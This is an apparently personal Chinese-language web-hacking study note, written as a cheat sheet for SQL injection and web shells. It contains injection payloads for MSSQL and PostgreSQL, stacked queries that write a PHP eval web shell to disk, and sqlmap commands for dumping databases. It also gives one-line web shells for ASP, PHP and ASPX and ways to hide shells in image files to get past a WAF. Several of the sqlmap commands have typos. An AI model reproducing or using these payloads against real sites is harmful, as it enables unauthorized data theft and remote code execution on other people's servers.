×××學習筆記

日誌文件後綴:.ldf
刪除數據庫要先分離,再從硬盤刪除,新建數據庫時,可看到路徑
判斷是否是mssql,and user>0
and 1=cast(version() as int) 獲取數據庫版本信息系統信息
and 1=cast(user||123 as int) 獲取當前用戶名稱 postgres用戶相當月root用戶
;create table xxx(w text not null)
;insert into xxx values($$<?php @eval($_post[密碼]);?>$$); 向X表中插入一句話×××
copy xxx(w) to $$/路徑/文件名.php$$; 將一句話×××保存爲php文件
提交方式:
get post cookie

測試工具pangolin sqlmap
sqlmap.py -u "注入點"
sqlmap.py -u "注入點" --data "表單參數名稱"
sqlmap.py -u "注入點" --data "表單參數名稱" --dbs 爆數據庫名稱
sqlmap.py -u "注入點" --data "表單參數名稱" --tables爆出表名
sqlmap.py -u "注入點" --data "表單參數名稱" --columns -T"表名" -D "數據庫名" 爆列名
sqlmap.py -u "注入點" --data "表單提交數據" --dump -C "列名稱" -T "表名" -D"數據庫名"

cookie提交用於賬號密碼的cookie緩存
還可以通過cookie注入來突破簡單的防注入系統

asp一句話
<%eval request("密碼")%>

參數注入:
數字型注入:
asp?id=5 and 1=1
字符型注入:
asp?id=你好'and 1=1 #閉合字符串,並且#註釋掉後面
搜索型注入:

burp抓搜索框數據,另存爲txt文本
sqlmap.py -r txt文本 --tables 猜表名
sapmap.py -r txt文本 --columns -T "列名" 猜列名
sqpmap.py -r txt文本 --C "列名,列名" -T "表名" --dump -V 2 列名

靜態頁面可通過後綴判斷是否爲僞靜態
id=2018.htm .htm取消掉,正常頁面,則證明爲僞靜態
小馬一般只有上傳功能,普遍用來上傳大馬
asp一句話
<%eval request("fahai")%>
php一句話
<?php @eval($_POST[value]);?>
aspx一句話
<%@ Page Language="密碼"%>
<%eval(Request.Item["value"])%>

騷操作:
cmd製作一句話:copy /b 圖片.jpg+一句話.asp 圖片.jpg
C32拖進圖片,十六進制模式,一句話複製到最後,保存
win7下右鍵,屬性,版權,插入一句話

包含突破waf
asp包含:<!--#include file="插入了一句話的圖片馬子"-->

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章